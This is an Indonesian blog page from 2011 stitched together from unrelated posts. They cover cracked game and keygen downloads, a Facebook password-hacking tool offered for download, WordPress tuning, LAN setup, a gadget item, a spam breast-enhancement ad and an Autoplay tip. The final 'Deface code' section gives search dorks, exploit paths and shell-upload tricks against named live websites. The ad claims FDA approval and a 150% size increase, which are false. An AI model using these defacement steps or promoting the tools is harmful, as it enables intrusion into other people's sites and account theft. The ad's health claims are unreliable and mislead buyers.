Rabu, 31 Agustus 2011

FREE DOWNLOAD

FREE DOWNLOAD


Selamat Idul Fitri 1432 H

Posted: 29 Aug 2011 11:33 PM PDT

30 hari sudah kita menjalankan ibadah puasaKini saatnya kita merayakan hari kemenanganWalaupun di antara kita terdapat perbedaan Kita berharap itu tidak di jadikan perpecahan. Di hari suci nan...

Artikel lengkapnya bisa anda baca di : www.remo-xp.com

Selasa, 30 Agustus 2011

FREE DOWNLOAD

FREE DOWNLOAD


Grand Theft Auto (GTA) 3 For PC

Posted: 28 Aug 2011 09:51 PM PDT

Remo-XP.com - Beberapa hari yang lalu saya sudah pernah share Game GTA San Andreas For PC. Pada kesempatan kali ini saya akan share game yang sudah di request oleh salah satu sobat blogger, yakni...

Artikel lengkapnya bisa anda baca di : www.remo-xp.com

Senin, 29 Agustus 2011

Artikel Terbaru Dunia Komputer

Artikel Terbaru Dunia Komputer


Download Gratis 5 Produk Ashampoo Plus License

Posted: 27 Aug 2011 08:54 PM PDT

Di blog ini saya telah beberapa kali membahas tentang produk Ashampoo, diantarnya Ashampoo Burning Studio 2010 Advanced, Ashampoo Registry Cleaner dan Download Gratis 5 Produk Ashampoo Senilai $125.95. Kali ini, Ashampoo lagi-lagi membagikan 5 produk mereka secara gratis. Kelima produk tersebut jika ditotal adalah senilai US$ 104.95. Kelima produk Ashampoo yang bisa Anda miliki secara [...]

Klik judul untuk membaca selengkapnya

Minggu, 28 Agustus 2011

FREE DOWNLOAD

FREE DOWNLOAD


Game Mario Buat PC

Posted: 27 Aug 2011 10:02 AM PDT

Remo-XP.com - Pasti sobat blogger semua udah nggak asing lagi dengan game Mario yang satu ini kan?? Game yang sangat populer pada zamannya. Nah, sekarang saya akan share game Mario Forever buat PC....

Artikel lengkapnya bisa anda baca di : www.remo-xp.com

Game Dora the Explorer

Posted: 26 Aug 2011 08:49 PM PDT

Remo-XP.com - Pada kesempatan kali ini saya akan share Game Dora the Explorer. Pastinya masih pada ingat doang dengan "swiper jangan mencuri, swiper jangan mencuri", Hehehe. Screenshot Dora the...

Artikel lengkapnya bisa anda baca di : www.remo-xp.com

Jumat, 26 Agustus 2011

FREE DOWNLOAD

FREE DOWNLOAD


Game Booster 2.4.1 Full Patch Keygen

Posted: 25 Aug 2011 10:52 AM PDT

Remo-XP.com - Sebenarnya hari ini saya share game GTA San Andreas Full RIP, tapi ada kesalahan teknis jadi terbit kemarin deh,,h ehe. Sekarang saya akan share aplikasi versi terbaru dari Game...

Artikel lengkapnya bisa anda baca di : www.remo-xp.com

GTA San Andreas PC Full RIP

Posted: 25 Aug 2011 05:06 AM PDT

Remo-XP.com - GTA San Andreas, salah satu game yang banyak di request di remo-xp, tapi berhubung saya baru dapat link nya sekarang, jadi baru bisa share sekarang deh, hehehe. Buat yang sudah request,...

Artikel lengkapnya bisa anda baca di : www.remo-xp.com

Kamis, 25 Agustus 2011

Artikel Terbaru Dunia Komputer

Artikel Terbaru Dunia Komputer


Download Wondershare PDF to Word Converter

Posted: 24 Aug 2011 05:30 PM PDT

Di blog Dunia Komputer ini, saya sudah beberapa kali memposting artikel tentang software pdf to word conveter, seperti Simpo PDF to Word Converter atau PDF to Word Converter. (Silahkan simak kembali artikel-artikel tersebut melalui link tadi). Kali ini ada satu lagi tool PDF to Word Converter gratis yang bisa Anda gunakan untuk mengkonversi file berformat [...]

Klik judul untuk membaca selengkapnya

FREE DOWNLOAD

FREE DOWNLOAD


Game Sega Virtua Fighter 2 For PC

Posted: 24 Aug 2011 10:04 AM PDT

Remo-XP.com - Buat anda yang sudah request game sega Virtua Fighter 2 For PC, silahkan aja langsung di cek,, Screenshot Virtua Fighter 2 For PC : Tinggal install and play the game. Enjoy,,...

Artikel lengkapnya bisa anda baca di : www.remo-xp.com

Rabu, 24 Agustus 2011

Facebook Account Hacker V 2.4 | About Facebook Hack

Hacking merupakan istilah mencuri atau merusak. Cara hack layaknya sebuah virus hanya beberapa bulan atau beberpa minggu dapat berkerja, selebihnya tools hack tersebut dapat terdekteksi, artinya pasti admin jaringan social seperti facebook, yahoo dll, ini telah di lengkapi dengan keamananan yang selalu di perbaharui, jadi setiap dia merasa ada spam atau pencuri data pasti dia akan mencari tahu di mana kelemahan jaringan facebook, yahoo, dll tersebut.

Seperti Facebook Account Hacker V 2.4 pada tahun lalu atau bulan febuary yang lalu sofware ini dapat digunakan untuk mencuri paswoord id secara oline di facebook dengan cara mengetik id korban terus mencoba menebak berapa jumlah paswoord si target. 100% berhasil tapi ini berhasil dengan baik pada bulan febuary 2009. Kalau sekarang?? Jangan harap deh. hehehe

Oiya, sobat blogger jangan mencoba menggunakan sofware Facebook acoount hacker V2.4 ini lagi, karena menurut iformasi yang saya dapatkan, bisa-bisa akun facebook anda di banned oleh facebook, karena pihak facebook akan merekam IP anda.

Sofware yang di jual bahkan yang ada di dalam internet sekarang kurang begitu update atau bahkan merusak dan menipu, seperti :

  1. Terkadang telah di sisipkan virus berupa virus trojan ex dll ketika di download.
  2. Dapat di download tetapi telah di password, kemudian kita di suruh membeli tetapi ketika kita mendapatkan passwordnya dengan cara membeli, isinya bukan hack tapi film doraemon.hahaha (banyak terjadi peniupuan seperti itu). Jadi hati-hati aja dalam membeli sesuatu di internet.
  3. Iming-iming dengan membayar berupa uang anda dapat mendapatkan password facebook email dan lain-lain.
  4. Bisa digunakan no virus tapi sayang di sayang sofware tersebut sudah jadul. Sudah di block oleh facebook.
Untuk sampai saat ini belom ada sofware yang berkerja dengan baik untuk mencuri password di facebook secara oline. Paling yang dapat digunakan untuk mengerjai orang di facebook hanya facebook freezer v1.0, seperti yang sudah saya bahas pada waktu yang lalu. Itu pun, untuk saat ini tool tersebut sudah tidak berjalan lagi, karena pihak facebook telah memperbaikinya.

Sekedar info saja, ada salah satu perusahaan yang bergerak di bidang IT di Amerika membuka jasa monitoring atau dengan kata lain mendapatkan paswoord acount email, facebook dll. tetapi hanya bisa di lakukan dengan cara mengisi formulir pemesanan nya dan datang lansung ke perusahaan tersebut. (artinya hanya anggota keluarga anda sendiri yang dapat di hack, contohnya suami kepada istrinya, ortu kepada anaknya yang masih di bawah 18 tahun). Jadi Hack tersbut 100% legal. (biaya 100$)

Buat sobat blogger yang penasaran dengan tool Facebook Account Hacker V 2.4 nya, silahkan di download aja, tapi saya tidak bertanggung jawab yah, bila terjadi hal-hal yang tidak diinginkan. Okeiii

Artikel ini saya ambil dari http://id-id.facebook.com, dengan perubahan kata seperlunya, dengan maksud agar mudah di pahami.

Optimasi wordpress

1. OPTIMISASI MySQL
Optimisasi MySQL biasanya hanya terpusat di file /etc/my.cnf. Saya lihat yang cukup penting adalah setting variable max_connections, key_buffer dan table_cache. Setting variable lain selengkapnya seperti di bawah, beberapa nyontek dari tulisan yang ada di list referensi.
max_connections = 500
key_buffer = 256M
max_allowed_packet = 1M
table_cache = 512
sort_buffer_size = 2M
read_buffer_size = 2M
myisam_sort_buffer_size = 64M
thread_cache = 8
query_cache_size = 512M
Sedangkan optimisasi table-table databasenya sendiri bisa menggunakan PhpMyadmin, khususnya fitur Optimize Table. Ada artikel menarik tentang ini di sini.
2. OPTIMISASI WORDPRESS dan PHP
Intinya saya pingin supaya tidak ada query ke database secara terus menerus di IlmuKomputer.Com. Bahasa gampangnya bagaimana membuat page yang dinamik dan banyak query ke database menjadi statik. Ini ternyata ada plugin WordPress yang bisa dipakai, namanya WP-Super-Cache. Instalasinya simple seperti plugin WordPress yang lain, dan ternyata efeknya cukup ampuh.
Teknik caching APC (Alternative PHP Cache) juga bisa digunakan. Berbeda dengan WP-Cache yang merupakan plugin WordPress, APC bisa digunakan untuk code PHP apapun karena dia perlu bermain-main langsung dengan setting php.ini
3. OPTIMISASI SCRIPT WORDPRESS
Optimasi bisa juga dilakukan ke script WordPress, misalnya dengan memperbaiki function call. Ini juga cukup menarik dilakukan, meskipun tidak se-ngefek pakai WP-Cache atau APC. Teknik ini tertulis lengkap di: http://elliottback.com/wp/archives/2006/07/27/optimizing-wordpress-performance-speed/
Teknik lain optimisasi script wordpress adalah dengan usaha mem-freeze pemanggilan $now, sehingga tidak terload berulang-ulang. Teknik ini efektif khususnya berhubungan dengan query post WordPress. Sudah ada pluginnya, bisa didownload dari http://txfx.net/code/wordpress/post-query-accelerator/ Instalasi juga sangat mudah karena tinggal upload ke /wp-content/plugins dan klik activate di menu administrasi WordPress.
4. OPTIMISASI APACHE
Optimisasi lengkap ada di http://httpd.apache.org/docs/1.3/misc/perf-tuning.html. Saya sendiri baru sempat ngoprek variable MaxClients, yang lainnya belum nyoba.

5. MIRRORING WORDPRESS
Jujur saja saya belum benar-benar blm paham teknik mirroring wordpress ke berbagai server. Hanya untuk mirroring wordpress dengan model P2P software, ternyata bisa pakai The Coral Content Distribution Network. Cukup menjanjikan, tapi sayangnya saya sendiri belum nyoba.

6. PENGGUNAAN SQUID
Mas Harry Sufehmi sudah menulis lengkap tentang penggunaan SQUID untuk server traffic tinggi di situsnya.

Membuat Jaringan (LAN) dengan 2 Komputer


Pada artikel ini, saya akan membahas mengenai cara membuat jaringan (LAN) kecil dengan 2 komputer dengan menggunakan kabel UTP. Untuk itu yang perlu Anda persiapkan adalah kabel UTP dan Jack RJ-45 yang sudah terpasang serta Network card pada masing-masing komputer. Biasanya komputer sekarang sudah dilengkapi dengan Lan Card pada motherboard komputer tersebut. Jika tidak ada Anda bisa membelinya di toko komputer bersama dengan kabel UTP dan Jack RJ-45.
Jika hanya menghubungkan 2 komputer, Anda tidak memerlukan sebuah hub atau switch. Namun, konfigurasi kabelnya yang sedikit berbeda. Jika Anda membuat jaringan untuk 2 komputer tanpa menggunakan hub atau switch, konfigurasi kebal yang digunakan adalah kabel Cross. Sebaliknya jika mengggunakan sebuah hub atau switch, untuk membuat jaringan lebih dari 2 komputer maka konfigurasi kabel yang digunakan adalah kabel Straight. (Silahkan baca Cara Memasang Kabel UTP Tipe Straight dan Cross)
Ok langsung saja saya bahas mengenai cara membuat jaringan (Lan) untuk menghubungkan 2 komputer. Beriikut langkah-langkahnya:
  1. Colokkan kabel UTP yang sudah dikonfigurasi dengan kabel cross ke port LAN card komputer pertama Anda.
  2. Jika Anda menggunakan Windows XP,buka Control Panel »» Network and Internet Connections »» Network Connections.
  3. Jika Menngunakan Windows 7 atau Vista, buka Control Panel. Pada icon Network and Internet, klik tulisan View Networks Status and Task.
  4. Network status
  5. Selanjutnya akan muncul jendela Networks and Sharing Center. Pada sisi sebelah kiri jendela ini, klik tulisan Change Adapter Setting
  6. Setting LAN Card
  7. Klik kanan pada Networkd Card Anda dan pilih properties.
  8. Konfigurasi LAN Card
  9. Pada jendela Local Area Connection Properties, pilih Internet Protocol (TCP/IP) pada Windows XP atau Internet Protocol Version 4 (TCP/IPv4) pada Windows 7 dan Vista. Kemudian klik tombol properties.
  10. LAN Properties
  11. Pada jendela properties yang muncul, pilih opsi Use the followinf IP Address dan isikan dengan 192.168.0.1 pada IP Adrees, 255.255.255.0 pada Subnetmask. Input yang tersisa bisa Anda kosongkan.
  12. Set IP Address
  13. Klik OK untuk menyimpan setting dan klik tombol OK juga pada Local Area Connection Properties
Selanjutnya agar kedua komputer tersebut bisa berhubungan, maka Workgroup dari komputer-komputer tersebut haruslah sama. Untuk itu, berikanlah nama Workgroup yang sama pada kedua komputer tersebut. Caranya sebagai berikut:
  1. Untuk pengguna Windows XP, bukalah system Properties dengan mengklik kanan icon My Computer dan pilih properties. Anda juga menekan tombol kombinasi keyboard Win + Break.
  2. Bagi Anda pengguna windows 7, caranya sedikit sama yaitu buka system properties dengan cara seperti pada windows XP. Pada jendela yang muncul klik tulisan Change Setting pada bagian Computer name, domain, and workgroup setting.
  3. Rubah nama computer
  4. Pada jendela System Properties, baik Windows XP, Vista ataupun Windows 7, klik tombol Change.
  5. System properties
  6. Di jendela berikutnya berikan nama untuk komputer 1 dengan nama yang diinginkan. Misalkan DK-1. Dan berikan nama dari workgroup Anda. Contonya Dunia Komputer.
  7. Nama computer
  8. Klik OK dan klik OK juga pada jendela System Properties.
Agar perubahan yang baru Anda lakukan berpengaruh pada system maka diperlukan proses restart. Untuk itu retart komputer Anda. Lakukanlah langkah-langkah yang sama dengan diatas untuk melakukan konfigurasi Network Card dan merubah nama komputer serta workgroup pada komputer kedua. Namun, bedanya pada komputer 2, IP address yang diberikan adalah 192.168.0.2. Subnetmask sama yaitu 255.255.255.0. Sedangkan Nama komputer harus berbeda. Misalkan berikan nama DK-2. Namun, workgroup haruslah sama.
Untuk mengetahui apakah kedua komputer tersebut sudah terhubung lakukanlanh ping dari komputer 1 ke komputer 2 atau sebaliknya. Caranya sebagia berikut:
  1. Buka Command Prompt dengan menekan tombol keyboard Win + R.
  2. Pada CMD ketik perintah “ping IP Address”. Ip Addrees diisi dengan IP komputer yang ingin di ping. Jika Anda melakukan ping dari komputer 1, maka IP address diisi dengan IP komputer 2. Begitu juga sebaliknya. Contoh perintah ping dari komputer 1 ke komputer 2:
    ping 192.168.0.2
  3. Jika koneksi antar kedua komputer tersebut berhasil maka hasilnya akan seperti ini:
    Pinging 192.168.0.2 with 32 bytes of data:
    Reply from 192.168.0.2: bytes=32 time<1ms TTL=128
    Reply from 192.168.0.2: bytes=32 time<1ms TTL=128
    Reply from 192.168.0.2: bytes=32 time<1ms TTL=128
    Reply from 192.168.0.2: bytes=32 time<1ms TTL=128
    Ping statistics for 192.168.0.2:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
  4. Jika hasilnya seperti ini:
    Pinging 192.168.0.2 with 32 bytes of data:
    Request time out
    Request time out
    Request time out
    Request time out
    Ping statistics for 192.168.0.2:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss)
    Berarti kedua komputer tersebut belum terkoneksi. Cobalah memeriksa apakah kabel sudah terhubung dengan benar atau mungkin saja ada kabel yang putus.
Jika semuanya sudah beres dan hasil ping sudah bagus, ini artinya Anda berhasil mengubungkan 2 komputer tersebut.

Sumber : www.mypc-spot.com

iPhone Bisa untuk Mengontrol Helikopter

Untuk mengontrol helikopter, iPhone akan menggunakan adaptor dan pemancar inframerah.



Untuk komunikasi, iPhone akan menggunakan pemancar inframerah untuk mengontrol RC helikopter tersebut. Adapun adaptor pemancar akan disambungkan ke iPhone lewat headphone jack. (geeky-gadgets.com)


Anda ingin menggunakan iPhone Anda untuk sesuatu yang lebih dari sekadar panggilan telepon dan menikmati multimedia? Anda bisa menggunakan telepon Apple Anda itu menjadi sebuah remote control bagi helikopter.

Griffin Technology, perusahaan pengembang aksesoris inovatif bagi perangkat komputer dan digital media memiliki solusinya. Dikutip dari Geeky Gadgets, 23 Agustus 2011, mereka menghadirkan Griffin TC Helo RC helikopter.

Untuk mengontrol, pada iPhone akan dipasangi aksesoris tambahan yakni adaptor pemancar dan aplikasi khusus. Adapun helikopternya sendiri menggunakan rotor kembar yang dipasang ke frame aluminium dan dengan tubuh hitam polikarbonat. Baterainya bisa diisi ulang lewat koneksi USB.

Untuk komunikasi, iPhone akan menggunakan pemancar inframerah untuk mengontrol RC helikopter tersebut. Adapun adaptor pemancar akan disambungkan ke iPhone lewat headphone jack.

Pemancar yang akan ditempelkan pada iPhone itu sendiri menggunakan daya dari 2 buah baterai AA. Pengguna yang ingin menerbangkan helikopternya bisa menggunakan aplikasi yang dipasang, atau menggunakan akselerometer internal milik iPhone.

Adapun jika baterai 3.7V 180mAh yang dipasng di helikopter terisi penuh, pengguna bisa menerbangkannya selama sekitar 8 menit.


Makin keren aja ya Iphone
sumber : vivanews.com

Kamis, 11 Agustus 2011

Cah Borneo Blog's» Cah Borneo Mulai Belajar

Cah Borneo Blog's» Cah Borneo Mulai Belajar


Breast Actives Cream

Posted: 10 Aug 2011 11:35 PM PDT

Breast Actives Cream is an all natural herbal supplement formulated to naturally increase the size, shape and firmness of women's breasts. It is specially manufactured with over thirteen unique herbs to assist in the development and natural growth of a woman's breasts without side effects.

Breast Actives Cream Benefits:

  1. Gain Full Cup Sizes in as little as 30 Days
  2. 100% Safe To Take, With No Side Effects
  3. No Embarrassing Doctor Visits
  4. Enlarge Your Breasts Naturally
  5. No dangerous and costly Surgery
  6. Turn heads when you walk in a room
  7. 100% FDA Approved Conditions

Breast Actives Cream Features

Breast Actives cream offers a non-surgical solution to attaining fuller, bigger, firmer breasts with the help of a balanced combination of safe, all-natural ingredients chosen for their ability to support breast enhancement.
Scientists have proven that stimulating the estrogen receptors in the breast with complex phytoestrogens, like those found in Breast Actives cream, can actually increase the size of the female breast as much as 150%.

Breast Actives cream

Click Here to Try Breast Actives Today!

Breast Actives Cream: Our Number One Choice For Breast Enhancement
Unlike other breast enhancement pills, Breast Actives works fast. Most women see evidence of breast growth in as little as 30 to 45 days and most accomplished their goal size in less than 90 days.

There is no reason to pay thousands of dollars for potentially dangerous breast augmentation surgery. Don't suffer the pain or be embarrassed for life by the scars left behind after one of these procedures. After extensive review, we've found that Breast Actives can give you similar breast enhancement results at a fraction of the price. It's also completely safe and natural, unlike potentially harmful Breast Enhancement Surgery.

To see the full benefits of this product we recommend purchasing a six month supply and save $120.

Click Here to Try Breast Actives Cream

Halaman ini ditemukan dengan kata kunci :

breast actives cream (1)


50 Dolar Per Signup. Anda mau!

Posted: 10 Aug 2011 10:31 PM PDT

Maaf, Anda tidak memiliki hak akses untuk membuka halaman ini. Silahkan Login untuk membaca artikel ini.(Jika Anda bukan member silahkan Register Sekarang!)


Senin, 08 Agustus 2011

Cara Me-nonaktifkan Autoplay/Autorun pd Win7


Autoplay/autorun adalah salah satu fitur windows yang berfungsi untuk membuka file yang berada di media data (CD/Hardisk Eksternal/Flashdisk,dll) secara otomatis. Ada beberapa kelemahan jika menggunakan/mengaktifkan fitur ini, yaitu:


  1. Jika CD/Hardisk Eksternal/Flashdisk mengandung virus maka virus dapat dengan mudah menyerang komputer anda melalui fitur autorun/autoplay windows 7,
  2. Windows 7 akan mengalokasikan memori untuk fitur autorun/autoplay, sehingga bisa menguras memori komputer anda.
Kita bisa menonaktifkan (disable) fitur autorun/autoplay windows 7. Berikut ini adalah cara untuk menonaktifkan atau mematikan fitur autorun/autoplay windows 7:
  1. Masuk Control Panel,
  2. Pilih Hardware and Sound,
  3. Pilih Autoplay,
  4. Lepaskan/hilangkan centang pada "Use Autoplay for all media devices",
  5. Terakhir klik tombol Save.

Deface code

1. Defacing ASPX
Langsung buka omm google, masukkan dork inurl:Fck/fcklinkgallery.aspx atau /portals/0/inurl:tabid/176/Default.aspx. Lalu saya ambil salah satu contoh web yg vuln http://www.primeplasticsinc.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx dan akan tampil halaman seperti ini. Link type nya kita ubah ke file (a file in your site).
 
Lalu ubah URL nya menjadi javascript:__doPostBack(‘ctlURL$cmdUpload’,” ). Maka tampil command choose file, lalu masukkan file anda dan upload.
Note: ekstensi file yang dapat di upload yaitu  ( *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip )
Untuk melihat hasilnya maka tambahkan public_html/portals/0/file_kamu. Maka akan seperti ini http://www.primeplasticsinc.net/portals/0/hack.txt tidak sulit kan ?? :)




2. Defacing OpenCart
Buka google, masukkan dork  Powered By OpenCart site:.com atau SUPPORT BY OPENCART
Saya mendapatkan target www.centaurguitar.com/storefront2/ lalu kita masukkan exploitnya admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html. Jadi alamatnya akan seperti ini www.centaurguitar.com/storefront2/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html dan akan muncul halaman website seperti ini

 

Ok langsung saja upload file kita, jika berhasil maka akan muncul message box “File uploaded with no errors” dan hasilnya seperti ini http://www.centaurguitar.com/hacked.html



3.    Defacing SPAW
Buka google, masukkan dork nya inurl:spaw2/dialogs/ atau inurl:spaw2/uploads/files/
Contoh targetnya seperti ini http://www.demariahoeve.nl/cms/spaw2/dialogs/dialog.php lalu perhatikan gambar ini
 
URL yang saya blog hapus dan diganti spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9

4.   Defacing Sitefinity CMS (ASP.NET) Shell Upload Vulnerability
Dork : “Sitefinity: Login”
Exploit : UserControls/Dialogs/ImageEditorDialog.aspx
Cari targetnya sama seperti cara diatas. Contoh targetnya http://www.hoac-bsa.org/sitefinity/ lalu masukkan exploitnya sehingga seperti ini http://www.hoac-bsa.org/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx lalu sekarang kita tinggal upload sheelnya, dalam ASP.NET file yang dapat diupload adalah JPG, contoh : (namashell.asp;.jpg) atau (namashell.asp;.gif). Jika sudah diupload, maka cara untuk menampilkan shell kita dengan mengklik “view original size” dan hasilnya seperti ini http://www.hoac-bsa.org/Images/hacked.asp;.jpg
Mungkin segitu aja yang bisa saya share, jadi kesimpulannya deface itu mudah bukan??


sumber : http://adhie70.wordpress.com/
Ada kesalahan di dalam gadget ini